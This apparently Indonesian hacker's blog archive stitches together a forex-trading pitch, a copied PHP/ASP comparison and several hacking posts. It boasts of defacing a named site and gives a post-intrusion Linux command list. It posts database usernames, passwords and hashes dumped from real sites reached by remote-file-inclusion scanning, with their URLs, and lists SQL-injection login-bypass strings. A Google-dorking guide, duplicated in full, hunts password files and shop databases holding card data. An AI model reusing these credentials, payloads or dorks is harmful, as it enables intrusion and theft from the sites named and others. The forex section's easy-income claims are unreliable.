Sunday, April 10, 2011

Learn Forex And Master Forex Currency Trading

If you wish to learn forex trading online then you have come to the best place to start your online forex trading education.

The forex market (sometimes referred to as the FX market or by its full title of the foreign exchange market) was established as we know it today in 1971 following the demise of fixed currency exchanges.

Forex currency trading is conducted around the clock, 5 days a week, and daily currency trades are worth in the region of $1.9 trillion us dollars. This means that the forex the largest market in the world and puts the major stock markets very firmly into second place.



A world-wide market established to facilitate the buying and selling of currency, the forex market involves large organizations, such as central governments, commercial companies and international commercial banks as well as smaller players such as brokerage houses and individual brokers.

There is no set location for the market (although there are major trading centers around the world in a number of cities such as London, Frankfurt, New York and Tokyo) but it is essentially an 'over-the-counter' market with the vast majority of trading being conducted by telephone and online.

The exchange of currencies is a central element in supporting global trade and, as the major currencies such as the US Dollar (USD), the British Pound (GBP), the Euro (EUR), the Australian Dollar (AUD), the Canadian Dollar (CAD), the Swiss Frank (CHF), the Japanese Yen (JPY) and others move against each other and the foreign currency exchange rate for any given pair of currencies changes, there is the opportunity to make money from currency exchanges.

The major players in the market take advantage of this by buying and selling in deals which often run into many millions of dollars, but the smaller players are also extremely active and often trade in deals of as low as one hundred thousand dollars. And, by trading on the back on the smaller players, individuals can get into the market with a lot less than that!
Learn Forex And Join The Growing Army Of Successful Forex Traders.

The fact that even small players can join this market means that, as long as you are prepared to take the time to understand the currency markets and to learn forex trading, then, with a little bit of capital to invest, it is possible to enjoy an excellent income from online currency trading.

Despite the fact that you cannot trade on your own and will have to use the services of a forex broker, you certainly don't need a fortune and many forex brokers will now allow you to open an online forex mini account with as little as $250.

The forex market is a technical market and it does takes a while to come to grips with the basic principles underlying the currency markets, to develop the necessary skills in the use of some of the trading tools (like technical analysis, fundamental analysis, different trading platforms, automated trading software and candlestick charts and other charting software) and to learn forex currency trading online.

Despite this, you do not have to be have experience of or be an expert in the currency markets to profit from them. As long as you take the time to learn forex trading and put in a bit of effort it is quite easy to gain enough of an understanding to begin making money through foreign trading online.

Foreign currency trading provides an excellent opportunity for the small investor to make money but learning to trade forex is essential before heading out into the market.

Through a large and growing collection of articles covering everything from the history of foreign currency trading to fundamental and technical analysis, psychology and strategies, tools and software we aim to help you learn forex trading quickly and easily.

So, click on over our forex articles collection and learn all about currency trading today so that you can become a forex trader tomorrow!

Saturday, June 21, 2008

http://shoutcast.com/downloads/sc1-9-8/sc_serv_1.9.8_Linux.tar.gz
b. tar -zxvf sc_serv_1.9.8_Linux.tar.gz
c. ./sc_serv

Sunday, November 25, 2007

http://www.i-putra.com.my/sites/admin/detail.cfm?ID=2
DEFACE LAGI DEFACE LAGI

KETIMBANG NGANGGUR


HHEHEHEHEHE

Thursday, November 22, 2007

linux commands in shell



cat ./../mainfile.php - Config file.

ls -la - Lists directory's.

ifconfig {eth0 etc} - Ipconfig equiv.

ps aux - Show running proccess's.

gcc in_file -o out_file - Compile c file.

cat /etc/passwd - List's accounts.

sudo - Superuser Do run a command as root provided you have perms
in /etc/sudoers
.

id - Tells you what user your logged in as.

which wget curl w3m lynx - Check's to see what downloaders are
present.


uname -r - Shows all release info (or) cat /etc/release.

uname -a - shows all kernal info (or) cat /etc/issue

last -30 - Last logged 30 ip's can change to desired number.

useradd - Create new user account.

usermod - Modify user account.

w - See who is currently logged on.

locate password.txt - Locates password.txt in current dur can use *.

rm -rf / - Please be carefull with this command, i cannot stress this
enough.


arp -a - Lists other machines are on the same subnet.

lsattr -va - ls file attributes on linux second extended file system

find / -type f -perm -04000 -ls - Finds suid files.

find . -type f -perm -04000 -ls - Finds suid files in current dir.

find / -type f -perm -02000 -ls - Finds all sgid files.

find / -perm -2 -ls - Finds all writable files and folders.

find . -perm -2 -ls - Finds all writable files and folders in current dir.

find / -type f -name .bash_history - Finds bash history.

netstat -an | grep -i listen - shows open ports.

cut -d: -f1,2,3 /etc/passwd | grep :: - From memory creates a user
with no pass.


find /etc/ -type f -perm -o+w 2> /dev/null - Write in /etc/passwd?.

cat /proc/version /proc/cpuinfo - Cpu info.

locate gcc- Finds gcc if installed.

set - Display system variables.

echo $path- Echo current path.

lsmod- Dumps kernal modules.

mount/df- Check mounted file system.

rpm -qa- Check patch level for RedHat 7.0.

dmesg- Check hardware ino.

cat /etc/syslog.conf - Log file.

uptime - Uptime check.

cat /proc/meminfo - Memory check.

find / -type f -perm -4 -print 2> /dev/null- Find readble files.

find / -type f -perm -2 -print 2> /dev/null - Find writable files.

chmod ### $folder - Chmod folder.

ls -l -b - Verbosly list directory's

PMEmail Poster
Top
Perintah2 Shell




ls -alfi : melihat daftar file di suatu direktori atau melihat atribut sebuah file
cat : melihat isi file
uname -a : melihat jenis OS serta versi
netstat -tnap : melihat koneksi keluar/masuk, atau listen
rm -rf : menghapus file atau direktori
cp : copy file
mv : mengganti nama file atau memindah file
echo : menampilkan kata yang dituliskan setelahnya
w : menampilkan user yang sedang login
whoami : menampilkan user kita sendiri
id : menampilkan user kita sendiri
mkdir : membuat direktori baru
touch : membuat file kosong
pwd : menampilkan irektori aktif
chown : mengganti kepemilikan file
chmod : mengganti atribut file
last : menampilkan daftar user-user yang pernah login
useradd : menambahkan user (root)
userdel : menghapus user (root)
usermod : memodifikasi user
passwd : mengganti password
su : ganti sebagai user lain
tar -zxvf : mengekstrak file tgz atau tar.gz
tar -czf : membuat file tgz
wget : mengambil suatu data dari suatu situs
lwp-download : mengambil suatu data dari suatu situs
curl : mengambil suatu data dari suatu situs
fetch : mengambil suatu data dari suatu situs (bsd)

Wednesday, November 21, 2007

LAN-hacking



Hack Any Network&Computer Without Sned Or Programme[Part2]



Hack Any Network&Computer Without Sned Or Programme[Part1]






Hack with tunneling



Exploit Hacking 2 - Privilege Escalation




Hacking dns server

PSP Hacking 101 - Ep 2 - Attack of the Firmware

Tuesday, November 20, 2007

Finally! The difference between PHP, ASP and other scripting languages.

PHP

PHP uses a blend of interpretation and compilation in order to provide the best mix of performance and flexibility to programmers.

Behind the scenes, PHP compiles your script down to a series of instructions (called opcodes) whenever it is accessed. These instructions are then executed one by one until the script terminates. This is different from conventional compiled languages such as C++ where the code is compiled down to native executable code then that executable is run from then on. Instead, PHP re-compiles your script each time it is requested.

This constant recompilation may seem a waste of processor time, but it is actually not all that bad because you no longer need to worry about hand recompiling your scripts when you make any changes. On the flip side, many scripts take longer to compile than they do to execute!

Furthermore, it provides very quick feedback during development. If you have an error somewhere in your file, PHP will refuse to compile the page until you have fixed the problem, and you are able to step through execution of your code line by line until you find the problem.

The speed hit of regular compilation is nullified entirely by the use of PHP accelerators.

One major advantage to having interpreted code is that all memory used by the script is managed by PHP, and the language automatically cleans up after every script has finished. This means that you do not need to worry about closing database links, freeing memory assigned to images, and so on, because PHP will do it for you. That is not to say you should be lazy and make PHP do all the work - good programmers clean up themselves, and let PHP work as backup in case something is missed.

Perl

Perl is the most popular of the PHP alternatives out there, arguably because it is also the oldest. There is a large installed base of Perl out there; many open-source projects require Perl to be installed to work properly. It has the advantages of being very (very!) flexible, and also having a large collection of modules already written for it. However, it is let down by the fact that it is very easy to write obfuscated and confusing Perl without really realising you are doing so, and this has resulted in such marvels as the annual Obfuscated Perl Contest.

Well-written Perl scripts often look fairly like their PHP equivalent. The major cause for Perl's messy appearance is that many Perl programmers rely on "one-liners" - packing large amounts of functionality into just one line of code. Perl was once described very accurately by its creator, Larry Wall, when he argued that the front cover for his O'Reilly book on Perl should be a camel, saying that Perl was ugly but serviceable, and able to go long distances without much nourishment.

Perl is often a better choice when you want to take advantage of some of the pre-written libraries. CPAN, Perl's library repository, is very big, and there is a huge range of code for you to take, customise, and re-use. Perl also has a very active - and very cool - hacker community around it that's a whole lot of fun to be part of and is really a bedrock of support when you need it. Larry Wall and Damian Conway (both core Perl developers) are both rightfully revered as "alpha geeks" - people who really push the envelope of programming by doing cool new things. They are both very friendly, and and attend many conferences year round - go ahead and introduce yourself if you meet them, because they really are fascinating to talk to.

ASP

Active Server Pages (ASP) and ASP.NET is Microsoft's attempt to succeed in the web development market, and comes as standard with their web server, IIS. ASP has been mauled by the open source community ever since it came out, and they gave a variety of reasons: it is proprietary, single platform (Windows), and slow.

I would like to say, "Yes, yes, and yes", but I'm not going to try to pull the wool over your eyes. The reality is that ASP has been implemented on other platforms, and, when running on Windows and Microsoft Internet Information Services (IIS), is actually lightning-fast.

That coupled with the fact that you can write add-on modules for ASP using Visual Basic and COM would make the whole solution very attractive indeed if it were not for the fact that ASP only really works well on IIS. On other platforms there are many fewer features, and it generally runs a great deal slower. When running on Windows, the security issues and licensing costs tends to be the most important thing, particularly when an all-Microsoft solution stack is being used.
and
ASP/ASP.NET is generally favoured when an all-Microsoft stack is in place. When used on Windows, it is very easy to deploy .NET code to ASP.NET pages or even write your ASP pages using C#.

ColdFusion

ColdFusion used to be quite popular back in the hey-days of the dot.com boom because it is developed using a proprietary IDE designed for novice programmers who have no wish to see source code of any complexity.

For such a wizard-oriented system, ColdFusion performs fairly well. Performance is nothing to be desired, but development speed is good. Perhaps ColdFusion's biggest let-down is the price tag - you will certainly need to sit down before you see it. ColdFusion was bought out by Macromedia, and this has served to boost its corporate appeal in places where open-source is still frowned upon.

The main drawback to using ColdFusion is arguably its user-friendliness, which might sound odd at first, but let me clarify. With PHP and Perl, because the languages are so flexible, you have much more control over what happens and why. If something goes wrong in your code, it's normally very easy to track it down and solve the problem, or change your plans and implement a different solution to the same problem. Very often, stock ColdFusion has just one way to solve a problem, and this greatly reduces your control over the solution you make. However, at the very least, you can work using ColdFusion when you are in team with non-technical people.

The biggest advantage to ColdFusion is its IDE and the language it uses, "CFML" (ColdFusion Markup Language) - even junior programmers can learn the system and start making pages quickly. As a result, you will often find ColdFusion in use at very large companies where they use Visual Basic (another easy, but not very powerful or fast language) for offline work.

JSP

Java Servlet Pages has often been considered the "dark horse" in web scripting because at first many thought it would be overkill for the job and yet has managed to get quite a substantial community about it nonetheless. JSP has three key advantages over some of its competitors, which may be why it has done so well:
  1. It uses Java, a language that already has a large skill set of developers and a massive amount of functionality available. Java is also conducive to scalability as it distributes across multiple computers well.
  2. Sun, as well as other members of the community, has worked hard to promote the language and tools that support it, which means that JSP has a lot of backing inside larger enterprises.
  3. It strongly encourages templating of pages for maximum code re-use. Templates for PHP are widely available, but they are a great deal more popular in JSP.
It is a common argument that because JSP is based on Java it scales better than PHP. This is not correct per se in the same way that most other over-generalisations are not correct (yes, I realise that is an over-generalisation too, and hence you are free to enjoy the irony!) - PHP scales perfectly well as long as you write your PHP scripts usi andng the same design patterns you would have used writing your JSPs.

JSP is a popular choice when existing back-end business logic is written in Java also, as this keeps the development team language-homogenous.


From: http://www.hudzilla.org/phpbook/read.php/2_2_5

Tuesday, November 13, 2007

sekarang mah udah Online tiap hariii. bisa nongkrong lama-lama diinternet, Pasang DSL eeuy dirumah....dari pada bengong, langsung aja gw browsing ngeoprek-ngoprek file-file lama yang tercecer dimana-mana. heheheh bahasanya cuukkk....

langsung aja deh....gw sebenernya gw merasa ketinggalan sekali perkembangan dunia underground ya semacam security lah(bahasa berat kali boooooo).....abis lama gak pernah ONLINE...paling juga Online di YM aja...itu biasa buat mozok aja ngilangin stress...


langsung gw beraksi. eng ing eng......berubah superman xixixixi....sok mantap..
lama gak main shell

abis Nyecan pake RFI

lumayan deh dapet

!scan administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path= com_x-shop


$mosConfig_offline = '0';
$mosConfig_host = 'localhost';
$mosConfig_user = 'u_autoscan_d';
$mosConfig_password = '4u705c4n';
$mosConfig_db = 'autoscan_db';
$mosConfig_dbprefix = 'au_';
$mosConfig_lang = 'russian

http://autoscan.com.ua/administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=




Falfrir /neformat = ec7d56ebc5f82e6b922de0bdd1674d16

scanscop = bbd370eda96624f872fa068e195dbd54



DB_TYPE = "mssql";
$DB_HOST = "(local)";
$DB_NAME = "erl2";
$DB_USER = "erl2";
$DB_PASS = "erl2";
$DB_PREFIX = "Erl2_"

http://emis.erl.itri.org.tw:8080/erl2/



$mosConfig_editor = 'htmlarea2';
$mosConfig_offline = '0';
$mosConfig_host = 'localhost';
$mosConfig_user = 'admin';
$mosConfig_password = '2e2us0y2';
$mosConfig_db = 'mo_mswnl';
$mosConfig_dbprefix = 'mos_';


http://www.measurework.nl/mswnl/mambo4/administrator/

admin = c2e8571ba9f9342435385b37f4661506
Erik = b7c86bf6a26cdb6faa9a98bb6b6063a3

code BY pass SQL injecktion



pass:' union select * from tbluser where '1'='1
--------------------------------------------
user&pass : '<>'1
--------------------------------------------
user&pass : a'or'a'='a
--------------------------------------------
user : '<>1 and fldusername<>'
pass : '
--------------------------------------------
user&pass: ' and 1=1or '1'='1
--------------------------------------------
user : '+(select top 1 fldusername from tbluser)+'
pass : '+(select top 1 fldpassword from tbluser)+'
-------------------------------------------
user&pass: ' not in ('1') and '1'='1
-------------------------------------------
user&pass : 1'<'2
-------------------------------------------
user&pass : ' is not null and '1'='1
------------------------------------------
user :' oror ''='
pass:' oror ''='
------------------------------------------
user/pass :' oorr ''='

' or ' ,a'or'a'='a ,' oror ''='

Mengoptimalkan Penggunaan Search Engine
oleh fuhrer
Last Update : 10 Juli 2004

Internet adalah gudangnya dari informasi. Hampir semua hal yang berbentuk digital dapat kita temukan di sini. Di internet kita bisa mendapatkan berita yang serius sampai dengan obrolan tukang becak, software gratis sampai dengan yang paling mahal, file musik klasik sampai dengan Ikke Nurjanah. Tidak ada batasnya.

Di dunia underground, internet disalahgunakan untuk kegiatan-kegiatan illegal. Dari hacking, carding sampai dengan bajak-membajak software sudah tidak asing lagi.

Tapi untuk menemukan kebutuhan kita secara spesifik tidak selalu mudah, seperti mencari jarum dalam sekam, kecuali Anda bisa menggunakan search engine dengan efektif.

Saat ini Google (http://www.google.com) masih menjadi search engine yang paling handal, karena bisa menjangkau daerah-daerah yang bahkan seharusnya restricted. Begitu hebatnya Google, sampai-sampai kegiatan searching di internet disebut dengan googling.

Kali ini saya akan mengajak sodara-sodara sebangsa dan setanah air untuk belajar bersama-sama cara menggunakan Google dengan optimal.

Menggunakan Boolean

Bagi Anda yang pernah belajar programming tentu sudah mengerti apa itu boolean. Boolean dalam bahasa Indonesia mungkin mirip artinya dengan logika. Google mengenal beberapa tanda boolean, antara lain :

  1. tanda “+” atau AND
  2. tanda “–“ atau NOT
  3. OR

Tanda “+”
Tanda “+” (plus) atau “AND” digunakan untuk mencari informasi di internet yang mengandung dua kata atau lebih yang kita tentukan, misalnya :
wallpaper + free + download
Hasil pencarian Google adalah halaman-halaman web di mana setiap halaman mempunyai tiga kata tersebut. Jika suatu halaman web hanya memiliki salah satunya saja maka tidak akan ditampilkan oleh Google.

Tanda “-”
Jika Anda menginginkan informasi tentang sepeda motor tapi Anda tidak ingin informasi tersebut berhubungan dengan Honda, Anda dapat menuliskan :
sepeda + motor – honda
Hasil yang sama akan didapatkan dengan menuliskan :
sepeda + motor NOT honda
(kata NOT tidak harus ditulis dengan huruf besar).

Tanda “OR”
Hasil pencarian Google untuk dua kata atau lebih yang dihubungkan dengan tanda “OR” sama dengan jika kata-kata tersebut dipisahkan oleh spasi. Misalnya Anda mengingikankan informasi tentang kegiatan hacking atau carding di Indonesia, Anda dapat menuliskan :
indonesia + hacking OR carding.

Pencarian Frase
Yang dimaksud frase adalah kumpulan dua kata atau lebih. Pencarian frase tertentu menggunakan Google dapat dituliskan dengan menuliskan frase tersebut di antara tanda petik ( “ ), contoh :
“Introduction to SQL Injection”.
Dengan kata kunci tersebut, Google akan memberikan dokumen-dokumen yang persis memuat frase tersebut. Contoh yang lain :
“Seventh son of seventh son”.
Dengan frase tersebut, kemungkinan besar Google akan memberikan hasil lirik lagu Iron Maiden. Pencarian dengan frase ini hasilnya sangat tajam, pastikan Anda menguasainya.

OK, teknik searching di atas adalah dasar dari teknik-teknik pencarian informasi di internet. Walaupun diasumsikan kita menggunakan Google, sebenarnya teknik-teknik tersebut dapat digunakan pada hampir semua search engine. Selanjutnya kita akan menginjak teknik-teknik yang lebih mengasyikkan, dan hanya Google yang bisa melakukannya. Yeah, Google is the best.

Mencari Directory Index
Jika suatu folder atau directory tidak mengandung file index (index.html, index.htm, index.php atau index.asp), maka akan ditampilkan daftar file yang ada di folder atau directory tersebut, dan judul atau title dari halaman yang tampil tersebut akan menjadi “Index of /nama_folder”.

Misalnya kita ingin mencari file mp3, maka kita dapat masukkan kata kunci :
“index of” + mp3
“index of” + mp3s

(ingat pelajaran Bahasa Inggris saat kita SMP, mp3s adalah kata jamak dari mp3)
“index of” + mp3 + metallica
“index of” + mp3 + rock

Contoh yang lain, misalnya kita ingin mencari database dari sebuah online shop yang, siapa tahu, ada informasi tentang credit card :
“index of” + mdb
“index of” + shop + mdb
“index of” + order
“index of” + orders + mdb
“index of” + “cgi-bin” + order

Menggunakan kata bantu filetype
Dengan menggunakan kata bantu filetype, kita dapat mempertajam pencarian file dengan ekstensi tertentu, misal :
filetype:doc
filetype:mdb
filetype:pdf

Menggunakan kata bantu site
Kata bantu site berguna untuk pencarian situs dengan domain tertentu, misalnya kita mencari file MS Word di situs militer, maka ditulis :
filetype:doc site:.mil

Contoh yang lain :
“index of” + password site:.ac.id
“login.asp” site:.go.au

Menggunakan kata bantu inurl
Kata bantu inurl digunakan untuk menemukan situs yang memiliki url tertentu, misalnya :
inurl: wwwboard/passwd.txt
Pencarian dari kata tersebut akan menghasilkan kurang lebih 139 links, yang masing-masing akan menampilan string yang ada di file passwd.txt. Oh, ya wwwBoard adalah message board berbasis CGI yang secara default menyimpan passwordnya pada file passwd.txt dengan format username:password.

Menggunakan kata bantu intitle
Seperti kita tahu bahwa setiap halaman web memiliki judul atau title. Kata bantu intitle berfungsi mencari dokumen spesifik yang mempunyai judul atau title yang kita tentukan, misalnya :
intitle:"index of" htpasswd
intitle:"admin login”
intitle:"restricted”

Contoh Aplikasi

Berikut ini contoh-contoh nakal dari pemanfaatan Google :
“index of” + admin
“index of” + members
“index of” + account + mdb
“index of” + “accounts.mdb”
inurl:”admin/password.txt”
inurl:”admin/order.txt”
inurl:”shop/orders.log”
inurl:iisadmin
“index of” + “showcode.asp”
“index of” + “EIPC.mdb”
“index of” + “shop.mdb”



baca selengkapnya


www.johnny.ihackstuff.com

Mengoptimalkan Penggunaan Search Engine
oleh fuhrer
Last Update : 10 Juli 2004

Internet adalah gudangnya dari informasi. Hampir semua hal yang berbentuk digital dapat kita temukan di sini. Di internet kita bisa mendapatkan berita yang serius sampai dengan obrolan tukang becak, software gratis sampai dengan yang paling mahal, file musik klasik sampai dengan Ikke Nurjanah. Tidak ada batasnya.

Di dunia underground, internet disalahgunakan untuk kegiatan-kegiatan illegal. Dari hacking, carding sampai dengan bajak-membajak software sudah tidak asing lagi.

Tapi untuk menemukan kebutuhan kita secara spesifik tidak selalu mudah, seperti mencari jarum dalam sekam, kecuali Anda bisa menggunakan search engine dengan efektif.

Saat ini Google (http://www.google.com) masih menjadi search engine yang paling handal, karena bisa menjangkau daerah-daerah yang bahkan seharusnya restricted. Begitu hebatnya Google, sampai-sampai kegiatan searching di internet disebut dengan googling.

Kali ini saya akan mengajak sodara-sodara sebangsa dan setanah air untuk belajar bersama-sama cara menggunakan Google dengan optimal.

Menggunakan Boolean

Bagi Anda yang pernah belajar programming tentu sudah mengerti apa itu boolean. Boolean dalam bahasa Indonesia mungkin mirip artinya dengan logika. Google mengenal beberapa tanda boolean, antara lain :

  1. tanda “+” atau AND
  2. tanda “–“ atau NOT
  3. OR

Tanda “+”
Tanda “+” (plus) atau “AND” digunakan untuk mencari informasi di internet yang mengandung dua kata atau lebih yang kita tentukan, misalnya :
wallpaper + free + download
Hasil pencarian Google adalah halaman-halaman web di mana setiap halaman mempunyai tiga kata tersebut. Jika suatu halaman web hanya memiliki salah satunya saja maka tidak akan ditampilkan oleh Google.

Tanda “-”
Jika Anda menginginkan informasi tentang sepeda motor tapi Anda tidak ingin informasi tersebut berhubungan dengan Honda, Anda dapat menuliskan :
sepeda + motor – honda
Hasil yang sama akan didapatkan dengan menuliskan :
sepeda + motor NOT honda
(kata NOT tidak harus ditulis dengan huruf besar).

Tanda “OR”
Hasil pencarian Google untuk dua kata atau lebih yang dihubungkan dengan tanda “OR” sama dengan jika kata-kata tersebut dipisahkan oleh spasi. Misalnya Anda mengingikankan informasi tentang kegiatan hacking atau carding di Indonesia, Anda dapat menuliskan :
indonesia + hacking OR carding.

Pencarian Frase
Yang dimaksud frase adalah kumpulan dua kata atau lebih. Pencarian frase tertentu menggunakan Google dapat dituliskan dengan menuliskan frase tersebut di antara tanda petik ( “ ), contoh :
“Introduction to SQL Injection”.
Dengan kata kunci tersebut, Google akan memberikan dokumen-dokumen yang persis memuat frase tersebut. Contoh yang lain :
“Seventh son of seventh son”.
Dengan frase tersebut, kemungkinan besar Google akan memberikan hasil lirik lagu Iron Maiden. Pencarian dengan frase ini hasilnya sangat tajam, pastikan Anda menguasainya.

OK, teknik searching di atas adalah dasar dari teknik-teknik pencarian informasi di internet. Walaupun diasumsikan kita menggunakan Google, sebenarnya teknik-teknik tersebut dapat digunakan pada hampir semua search engine. Selanjutnya kita akan menginjak teknik-teknik yang lebih mengasyikkan, dan hanya Google yang bisa melakukannya. Yeah, Google is the best.

Mencari Directory Index
Jika suatu folder atau directory tidak mengandung file index (index.html, index.htm, index.php atau index.asp), maka akan ditampilkan daftar file yang ada di folder atau directory tersebut, dan judul atau title dari halaman yang tampil tersebut akan menjadi “Index of /nama_folder”.

Misalnya kita ingin mencari file mp3, maka kita dapat masukkan kata kunci :
“index of” + mp3
“index of” + mp3s

(ingat pelajaran Bahasa Inggris saat kita SMP, mp3s adalah kata jamak dari mp3)
“index of” + mp3 + metallica
“index of” + mp3 + rock

Contoh yang lain, misalnya kita ingin mencari database dari sebuah online shop yang, siapa tahu, ada informasi tentang credit card :
“index of” + mdb
“index of” + shop + mdb
“index of” + order
“index of” + orders + mdb
“index of” + “cgi-bin” + order

Menggunakan kata bantu filetype
Dengan menggunakan kata bantu filetype, kita dapat mempertajam pencarian file dengan ekstensi tertentu, misal :
filetype:doc
filetype:mdb
filetype:pdf

Menggunakan kata bantu site
Kata bantu site berguna untuk pencarian situs dengan domain tertentu, misalnya kita mencari file MS Word di situs militer, maka ditulis :
filetype:doc site:.mil

Contoh yang lain :
“index of” + password site:.ac.id
“login.asp” site:.go.au

Menggunakan kata bantu inurl
Kata bantu inurl digunakan untuk menemukan situs yang memiliki url tertentu, misalnya :
inurl: wwwboard/passwd.txt
Pencarian dari kata tersebut akan menghasilkan kurang lebih 139 links, yang masing-masing akan menampilan string yang ada di file passwd.txt. Oh, ya wwwBoard adalah message board berbasis CGI yang secara default menyimpan passwordnya pada file passwd.txt dengan format username:password.

Menggunakan kata bantu intitle
Seperti kita tahu bahwa setiap halaman web memiliki judul atau title. Kata bantu intitle berfungsi mencari dokumen spesifik yang mempunyai judul atau title yang kita tentukan, misalnya :
intitle:"index of" htpasswd
intitle:"admin login”
intitle:"restricted”

Contoh Aplikasi

Berikut ini contoh-contoh nakal dari pemanfaatan Google :
“index of” + admin
“index of” + members
“index of” + account + mdb
“index of” + “accounts.mdb”
inurl:”admin/password.txt”
inurl:”admin/order.txt”
inurl:”shop/orders.log”
inurl:iisadmin
“index of” + “showcode.asp”
“index of” + “EIPC.mdb”
“index of” + “shop.mdb”



baca selengkapnya


www.johnny.ihackstuff.com